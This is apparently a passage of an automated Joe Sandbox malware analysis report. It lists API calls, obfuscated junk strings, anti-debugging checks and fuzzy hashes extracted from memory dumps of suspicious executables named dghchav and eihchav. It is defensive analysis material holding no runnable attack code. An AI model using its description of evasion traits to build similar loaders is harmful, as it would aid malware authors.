                                                                                            • Instruction Fuzzy Hash: 5B31D4323006105BD7249E5CEA8892BF7E9EB96724B20053FF6819B7D1C7F69C4083A9
                                                                                            APIs
                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 00402266
                                                                                              • Part of subcall function 004026B3: std::exception::exception.LIBCMT ref: 004026C8
                                                                                              • Part of subcall function 004026B3: __CxxThrowException@8.LIBCMT ref: 004026DD
                                                                                              • Part of subcall function 004026B3: std::exception::exception.LIBCMT ref: 004026EE
                                                                                            • _memmove.LIBCMT ref: 0040229F
                                                                                            Strings
                                                                                            • invalid string position, xrefs: 00402261
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000026.00000002.4487487566.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000026.00000002.4487238470.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4487739418.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488022420.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488099212.000000000043F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488246440.0000000000443000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488347777.000000000044F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_38_2_400000_dghchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                            • String ID: invalid string position
                                                                                            • API String ID: 1785806476-1799206989
                                                                                            • Opcode ID: b56cbde4b5741721c71b416657eb355db1661ea1ddbc07c80a778b71fa99b475
                                                                                            • Instruction ID: b532337ec7994005aad34219bb82fd50322612a352a3c812ffe05700ee7ff894
                                                                                            • Opcode Fuzzy Hash: b56cbde4b5741721c71b416657eb355db1661ea1ddbc07c80a778b71fa99b475
                                                                                            • Instruction Fuzzy Hash: ED01C8313006108BD7259DECEA8892AB3AAAB95714724497FD181DB7C1D6F5DC4283A8
                                                                                            APIs
                                                                                              • Part of subcall function 00403F0E: __getptd.LIBCMT ref: 00403F14
                                                                                              • Part of subcall function 00403F0E: __getptd.LIBCMT ref: 00403F24
                                                                                            • __getptd.LIBCMT ref: 00406F8A
                                                                                              • Part of subcall function 00405C8D: __getptd_noexit.LIBCMT ref: 00405C90
                                                                                              • Part of subcall function 00405C8D: __amsg_exit.LIBCMT ref: 00405C9D
                                                                                            • __getptd.LIBCMT ref: 00406F98
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000026.00000002.4487487566.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000026.00000002.4487238470.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4487739418.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488022420.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488099212.000000000043F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488246440.0000000000443000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488347777.000000000044F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_38_2_400000_dghchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                            • String ID: csm
                                                                                            • API String ID: 803148776-1018135373
                                                                                            • Opcode ID: cdc7085df4bdca6dd5cb85aeb7587dd7b0b4bfb9eb8903284afffdbeadc83030
                                                                                            • Instruction ID: 50fe1fbb3cba8a88096214dfc38fae97991bbe41bdead42efad8af6b847898c5
                                                                                            • Opcode Fuzzy Hash: cdc7085df4bdca6dd5cb85aeb7587dd7b0b4bfb9eb8903284afffdbeadc83030
                                                                                            • Instruction Fuzzy Hash: CF014B358006068ADF349F25E4506AEB7B5AF10315F25443FE442763D2CF3999A4DF49
                                                                                            APIs
                                                                                            • DecodePointer.KERNEL32(?,004048A1,00000000,00000000,00000000,00000000,00000000,0040A0B4,?,004062E8,00000003,004040FC,00000001,00000000,00000000), ref: 00404873
                                                                                            • __invoke_watson.LIBCMT ref: 0040488F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000026.00000002.4487487566.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000026.00000002.4487238470.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4487739418.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488022420.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488099212.000000000043F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488246440.0000000000443000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488347777.000000000044F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_38_2_400000_dghchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: DecodePointer__invoke_watson
                                                                                            • String ID: PNv
                                                                                            • API String ID: 4034010525-4070351811
                                                                                            • Opcode ID: 03d653105b9490b78c419c36ceb1153564a21bb8c04f1486bee4100b04d653b3
                                                                                            • Instruction ID: 3f05b26e2c2f593857254486353de4146da07769d251753da72b248ad5f130c6
                                                                                            • Opcode Fuzzy Hash: 03d653105b9490b78c419c36ceb1153564a21bb8c04f1486bee4100b04d653b3
                                                                                            • Instruction Fuzzy Hash: F5E08CBA000149BBCF013FA2DC0996A3F2AFB80750B408834FE1490030D636C930DB98
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000026.00000002.4487487566.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000026.00000002.4487238470.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4487739418.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488022420.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488099212.000000000043F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488246440.0000000000443000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000026.00000002.4488347777.000000000044F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_38_2_400000_dghchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: DecodePointer
                                                                                            • String ID: PNv
                                                                                            • API String ID: 3527080286-4070351811
                                                                                            • Opcode ID: 1eeefc6a7b26db4e76b873c9ae92e99a627549591bb141e4449471a95ee55ae7
                                                                                            • Instruction ID: 6ffe08d2489e19cafbcafacff543f2e992a29dbeb95095b17cc4da8373e3439c
                                                                                            • Opcode Fuzzy Hash: 1eeefc6a7b26db4e76b873c9ae92e99a627549591bb141e4449471a95ee55ae7
                                                                                            • Instruction Fuzzy Hash: A9C04CB0B942106AFA103BF65C0B76966259F55B0AF048437BB06B81C2EEFD9624546F

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • _lcreat.KERNEL32(00000000,00000000), ref: 00401E84
                                                                                            • _hread.KERNEL32(00000000,00000000,00000000), ref: 00401E8D
                                                                                            • GetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00401E99
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00401EA0
                                                                                            • QueryDosDeviceW.KERNEL32(wopeducuzecogexojinuliwutocekay fehotusafobozaheyezesorunizemozo laxuvofududogateducokuxavoxabe ganinebudez,?,00000000), ref: 00401EB4
                                                                                            • _free.LIBCMT ref: 00401EBB
                                                                                              • Part of subcall function 004031CD: HeapFree.KERNEL32(00000000,00000000,?,00402C76,?,?,00401021), ref: 004031E3
                                                                                              • Part of subcall function 004031CD: GetLastError.KERNEL32(?,?,00402C76,?,?,00401021), ref: 004031F5
                                                                                              • Part of subcall function 0040354F: _malloc.LIBCMT ref: 0040355D
                                                                                              • Part of subcall function 004033A0: __indefinite.LIBCMT ref: 00405060
                                                                                            • __floor_pentium4.LIBCMT ref: 00401EDF
                                                                                            • SetFilePointer.KERNELBASE(00000000,5D8DD343,00000000,00000000,3B09B99F,1C76D52B,1A1DACC1,7C3F92FE,660FFCA4,76D4F808,3E8EECA6,07B34857,42B591E9,43C33179,0787356F,7E982BF0), ref: 00401F02
                                                                                            • GetTickCount.KERNEL32 ref: 00401F04
                                                                                            • GetLastError.KERNEL32 ref: 00401F06
                                                                                            • GetCharWidthI.GDI32(00000000,00000000,00000000,00000000,00000000), ref: 00401F37
                                                                                            • GetCurrentDirectoryA.KERNEL32(00000000,?), ref: 00401F82
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.4487233140.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.4487153590.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487412054.000000000040E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487736486.000000000043E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487862913.000000000043F000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4488026722.0000000000443000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4488141469.000000000044F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_39_2_400000_eihchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorFreeLast$CalendarCharCountCurrentDeviceDirectoryFileGlobalHeapInfoPointerQueryTickWidth__floor_pentium4__indefinite_free_hread_lcreat_malloc
                                                                                            • String ID: ":,x$7-T=$GxBn$J}s`$K`:$O$b~$ls/K$wopeducuzecogexojinuliwutocekay fehotusafobozaheyezesorunizemozo laxuvofududogateducokuxavoxabe ganinebudez
                                                                                            • API String ID: 796562619-3640916101
                                                                                            • Opcode ID: 5b62af958a8a5cfe41154391c2308383ceea0963f1506c16c3cd9f53653e7d45
                                                                                            • Instruction ID: 31eeef3b46cfc77afa1b895734239e173ec2656641c401c6440a81c1e53693ed
                                                                                            • Opcode Fuzzy Hash: 5b62af958a8a5cfe41154391c2308383ceea0963f1506c16c3cd9f53653e7d45
                                                                                            • Instruction Fuzzy Hash: 1EF11EB5609380CFD2648F6AC589B8FFBE4BF85314F10891DEA999B620C7308885CF57

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000000), ref: 00401180
                                                                                            • GetNumberFormatW.KERNEL32(00000000,00000000,sogudowuwotekonex digimabawer rujusogepisalojar,00000000,?,00000000), ref: 004011DA
                                                                                            • GetLogicalDriveStringsA.KERNEL32(00000000,?), ref: 004011E5
                                                                                            • VerifyVersionInfoW.KERNEL32(?,00000000,00000000,00000000), ref: 004011F8
                                                                                            • CopyFileW.KERNEL32(00000000,00000000,00000000), ref: 00401204
                                                                                            • GetStdHandle.KERNEL32(00000000), ref: 0040120C
                                                                                            • GetComputerNameW.KERNEL32(?,?), ref: 0040121D
                                                                                            • ClearCommBreak.KERNEL32(00000000), ref: 00401225
                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 0040122F
                                                                                            • EnumCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040123D
                                                                                            • GetTempPathA.KERNEL32(00000000,?), ref: 00401248
                                                                                            • _memset.LIBCMT ref: 0040125D
                                                                                            • CommConfigDialogW.KERNEL32(00000000,00000000,?), ref: 0040126D
                                                                                            • GetVersionExW.KERNEL32(?), ref: 0040127A
                                                                                            • CreateActCtxA.KERNEL32(?), ref: 00401287
                                                                                            • InterlockedIncrement.KERNEL32(?), ref: 00401291
                                                                                            • GetShortPathNameA.KERNEL32(00000000,?,00000000), ref: 004012A2
                                                                                            • EnumCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004012B0
                                                                                            • GetLocaleInfoA.KERNEL32(00000000,00000000,?,00000000), ref: 004012BF
                                                                                            • SetVolumeMountPointA.KERNEL32(00000000,00000000), ref: 004012D8
                                                                                            • GlobalWire.KERNEL32(00000000), ref: 004012E0
                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,yoyorohexumutuwasetebayuda), ref: 0040131D
                                                                                            Strings
                                                                                            • yoyorohexumutuwasetebayuda, xrefs: 00401312
                                                                                            • sogudowuwotekonex digimabawer rujusogepisalojar, xrefs: 004011D1
                                                                                            • , xrefs: 00401142
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.4487233140.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.4487153590.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487412054.000000000040E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487736486.000000000043E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487862913.000000000043F000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4488026722.0000000000443000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4488141469.000000000044F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_39_2_400000_eihchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: Info$CalendarCommCreateEnumFileInterlockedNamePathVersion$AttributesBreakClearComputerConfigCopyDecrementDialogDriveEventFormatGlobalHandleIncrementLocaleLogicalMountNumberPointShortStringsTempVerifyVolumeWire_memset
                                                                                            • String ID: $sogudowuwotekonex digimabawer rujusogepisalojar$yoyorohexumutuwasetebayuda
                                                                                            • API String ID: 4125211919-822714830
                                                                                            • Opcode ID: 2da25961e6bd87d3ba8b56aaf714590959185fc7c8f29511d0965fdee03c0e56
                                                                                            • Instruction ID: 6e8595c7309441c1fc82682b68bb691d0adf6fcbe2b6dd9454a7df9c2f4daa29
                                                                                            • Opcode Fuzzy Hash: 2da25961e6bd87d3ba8b56aaf714590959185fc7c8f29511d0965fdee03c0e56
                                                                                            • Instruction Fuzzy Hash: 52716A75E40219AFEB14DFA5DD49B9EB7B4FB48700F108469E608BB2D0C7B46A40CF69

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • IsDebuggerPresent.KERNEL32 ref: 004078F7
                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040790C
                                                                                            • UnhandledExceptionFilter.KERNEL32((HD), ref: 00407917
                                                                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 00407933
                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 0040793A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.4487233140.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.4487153590.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487412054.000000000040E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487736486.000000000043E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487862913.000000000043F000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4488026722.0000000000443000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4488141469.000000000044F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_39_2_400000_eihchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                            • String ID: (HD$z{D
                                                                                            • API String ID: 2579439406-143753501
                                                                                            • Opcode ID: 0cca4cb3f6c34e2bac765e9ca107058cf167fc74ec1c3ba3081b062c0abda26a
                                                                                            • Instruction ID: 7c49ad6c5058463ad118c416b144a0f7b5f21ff1462cb7ffb68cc8e8a676fc82
                                                                                            • Opcode Fuzzy Hash: 0cca4cb3f6c34e2bac765e9ca107058cf167fc74ec1c3ba3081b062c0abda26a
                                                                                            • Instruction Fuzzy Hash: E321EFBC802204DBD700EF66FD897167BE0BB8A315F11143AE908A73A1EB745981AB4D

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetCurrentProcessId.KERNEL32 ref: 004014C8
                                                                                            • GetCharWidth32A.GDI32(00000000,00000000,00000000,00000000), ref: 004014CE
                                                                                            • CreateDCW.GDI32(00000000,00000000,00000000,00000000), ref: 004014FF
                                                                                            • FoldStringW.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040150C
                                                                                            • EnumSystemCodePagesW.KERNEL32(00000000,00000000), ref: 00401514
                                                                                            • CreateDCW.GDI32(00000000,00000000,00000000,00000000), ref: 0040151E
                                                                                            • CreateHardLinkA.KERNEL32(vokejawufikuvifofefahosinipibuhucolufacedagixiyidiligokososijuvoheyepusamudefexepiwagiga,tihofozawehuluberilepesuwezawudadelanixoboxovihoxipusoy,00000000), ref: 00401532
                                                                                            • WinHttpOpen.WINHTTP(00000000,00000000,00000000,00000000,00000000), ref: 0040153D
                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 00401547
                                                                                            • _strlen.LIBCMT ref: 0040155F
                                                                                            • LocalAlloc.KERNEL32(00000000,?), ref: 004015B2
                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll), ref: 004015C8
                                                                                            • GetProcAddress.KERNEL32(00000000,00444BC8), ref: 00401604
                                                                                            • GetLastError.KERNEL32(?,?,?,00000000), ref: 00401640
                                                                                            • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00401689
                                                                                            • GetDiskFreeSpaceExA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00401693
                                                                                            • LoadLibraryA.KERNEL32(00000000), ref: 0040169B
                                                                                            • ReadConsoleInputW.KERNEL32(00000000,?,00000000,?), ref: 004016A9
                                                                                            • DebugBreak.KERNEL32(?,?,?,00000000), ref: 004016AF
                                                                                            • LCMapStringA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 004016ED
                                                                                            • SetEnvironmentVariableW.KERNEL32(hiramemepugatipowuzela,venogoricilagudofufoyiz), ref: 004016F9
                                                                                            • OpenEventA.KERNEL32(00000000,00000000,00000000), ref: 00401701
                                                                                            • GetLastError.KERNEL32 ref: 00401720
                                                                                            • GetFileAttributesW.KERNEL32(00000000), ref: 0040176E
                                                                                            • GetShortPathNameW.KERNEL32(dumuve kogewetolunejem hexiboj kigatuletef wibugotizeyoxemevaraler,?,00000000), ref: 0040177E
                                                                                            • LocalFlags.KERNEL32(00000000), ref: 00401782
                                                                                            • RaiseException.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040178C
                                                                                            • SetFileTime.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040179A
                                                                                            • SetComputerNameA.KERNEL32(00000000), ref: 004017A2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.4487233140.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.4487153590.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487412054.000000000040E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487736486.000000000043E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487862913.000000000043F000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4488026722.0000000000443000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4488141469.000000000044F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_39_2_400000_eihchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: Create$ErrorFileInterlockedLastLibraryLoadLocalNameOpenString$AddressAllocAttributesBreakCharCodeCompareComputerConsoleCurrentDebugDecrementDiskEnumEnvironmentEventExceptionExchangeFlagsFoldFreeHardHttpInputLinkPagesPathProcProcessRaiseReadShortSpaceSystemTimeVariableWidth32_strlen
                                                                                            • String ID: $Bq $dumuve kogewetolunejem hexiboj kigatuletef wibugotizeyoxemevaraler$gulepulawoboxejobukade$hiramemepugatipowuzela$jjj$jjjj$kernel32.dll$tihofozawehuluberilepesuwezawudadelanixoboxovihoxipusoy$u4j$venogoricilagudofufoyiz$vokejawufikuvifofefahosinipibuhucolufacedagixiyidiligokososijuvoheyepusamudefexepiwagiga${
                                                                                            • API String ID: 3259815418-1288099099
                                                                                            • Opcode ID: ae542ebddf01555bf36e1c4a031898db846896596f30743461f146d0c513f33e
                                                                                            • Instruction ID: 7ffd6505b8b07ba356b2f6e5c8a1c1f02ec99392ee5c43898dc611a704e5bb30
                                                                                            • Opcode Fuzzy Hash: ae542ebddf01555bf36e1c4a031898db846896596f30743461f146d0c513f33e
                                                                                            • Instruction Fuzzy Hash: 2291A0B5944314AFE710AF61ED85B6A7B78FB45709F104939F605B72E0CBB85800CBAD

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 156 405dd6-405de8 GetModuleHandleW 157 405df3-405e3b GetProcAddress * 4 156->157 158 405dea-405df2 call 405b23 156->158 160 405e53-405e72 157->160 161 405e3d-405e44 157->161 164 405e77-405e85 TlsAlloc 160->164 161->160 163 405e46-405e4d 161->163 163->160 165 405e4f-405e51 163->165 166 405e8b-405e96 TlsSetValue 164->166 167 405f4c 164->167 165->160 165->164 166->167 168 405e9c-405ee2 call 4036a2 EncodePointer * 4 call 405678 166->168 169 405f4e-405f50 167->169 174 405ee4-405f01 DecodePointer 168->174 175 405f47 call 405b23 168->175 174->175 178 405f03-405f15 call 40450a 174->178 175->167 178->175 181 405f17-405f2a DecodePointer 178->181 181->175 183 405f2c-405f45 call 405b60 GetCurrentThreadId 181->183 183->169
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00403A6B), ref: 00405DDE
                                                                                            • __mtterm.LIBCMT ref: 00405DEA
                                                                                              • Part of subcall function 00405B23: DecodePointer.KERNEL32(00000004,00405F4C,?,00403A6B), ref: 00405B34
                                                                                              • Part of subcall function 00405B23: TlsFree.KERNEL32(00000003,00405F4C,?,00403A6B), ref: 00405B4E
                                                                                            • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00405E00
                                                                                            • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00405E0D
                                                                                            • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00405E1A
                                                                                            • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00405E27
                                                                                            • TlsAlloc.KERNEL32(?,00403A6B), ref: 00405E77
                                                                                            • TlsSetValue.KERNEL32(00000000,?,00403A6B), ref: 00405E92
                                                                                            • __init_pointers.LIBCMT ref: 00405E9C
                                                                                            • EncodePointer.KERNEL32(?,00403A6B), ref: 00405EAD
                                                                                            • EncodePointer.KERNEL32(?,00403A6B), ref: 00405EBA
                                                                                            • EncodePointer.KERNEL32(?,00403A6B), ref: 00405EC7
                                                                                            • EncodePointer.KERNEL32(?,00403A6B), ref: 00405ED4
                                                                                            • DecodePointer.KERNEL32(00405CA7,?,00403A6B), ref: 00405EF5
                                                                                            • __calloc_crt.LIBCMT ref: 00405F0A
                                                                                            • DecodePointer.KERNEL32(00000000,?,00403A6B), ref: 00405F24
                                                                                            • __initptd.LIBCMT ref: 00405F2F
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00405F36
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.4487233140.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.4487153590.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487412054.000000000040E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487736486.000000000043E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487862913.000000000043F000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4488026722.0000000000443000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4488141469.000000000044F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_39_2_400000_eihchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: Pointer$AddressEncodeProc$Decode$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
                                                                                            • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL$PNv
                                                                                            • API String ID: 3732613303-2259100434
                                                                                            • Opcode ID: 058c4305fbcc8a05b464aad084c638694769c468d8d830ac7ff23fc5814ed724
                                                                                            • Instruction ID: 49f715d1ab0fd03b29b3072b70511d18e901dfbf6f68d4dbe0345dc55c82754a
                                                                                            • Opcode Fuzzy Hash: 058c4305fbcc8a05b464aad084c638694769c468d8d830ac7ff23fc5814ed724
                                                                                            • Instruction Fuzzy Hash: 5F31A035C00611AAE710AF76ED0AE1B7EB4EB0AB51B10093BE450E22E0D73A8515CF9C

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00401689
                                                                                            • GetDiskFreeSpaceExA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00401693
                                                                                            • LoadLibraryA.KERNEL32(00000000), ref: 0040169B
                                                                                            • ReadConsoleInputW.KERNEL32(00000000,?,00000000,?), ref: 004016A9
                                                                                            • DebugBreak.KERNEL32(?,?,?,00000000), ref: 004016AF
                                                                                            • LCMapStringA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 004016ED
                                                                                            • SetEnvironmentVariableW.KERNEL32(hiramemepugatipowuzela,venogoricilagudofufoyiz), ref: 004016F9
                                                                                            • OpenEventA.KERNEL32(00000000,00000000,00000000), ref: 00401701
                                                                                            • GetLastError.KERNEL32 ref: 00401720
                                                                                            • GetFileAttributesW.KERNEL32(00000000), ref: 0040176E
                                                                                            • GetShortPathNameW.KERNEL32(dumuve kogewetolunejem hexiboj kigatuletef wibugotizeyoxemevaraler,?,00000000), ref: 0040177E
                                                                                            • LocalFlags.KERNEL32(00000000), ref: 00401782
                                                                                            • RaiseException.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040178C
                                                                                            • SetFileTime.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040179A
                                                                                            • SetComputerNameA.KERNEL32(00000000), ref: 004017A2
                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 004017B5
                                                                                            • LoadLibraryW.KERNEL32(0044DAB0), ref: 0040181C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.4487233140.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.4487153590.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487412054.000000000040E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487736486.000000000043E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4487862913.000000000043F000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4488026722.0000000000443000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000027.00000002.4488141469.000000000044F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_39_2_400000_eihchav.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileInterlockedLibraryLoadName$AttributesBreakCompareComputerConsoleDebugDecrementDiskEnvironmentErrorEventExceptionExchangeFlagsFreeInputLastLocalOpenPathRaiseReadShortSpaceStringTimeVariable
                                                                                            • String ID: dumuve kogewetolunejem hexiboj kigatuletef wibugotizeyoxemevaraler$hiramemepugatipowuzela$jjj$jjjj$u4j$venogoricilagudofufoyiz${
                                                                                            • API String ID: 2963091761-1312479106
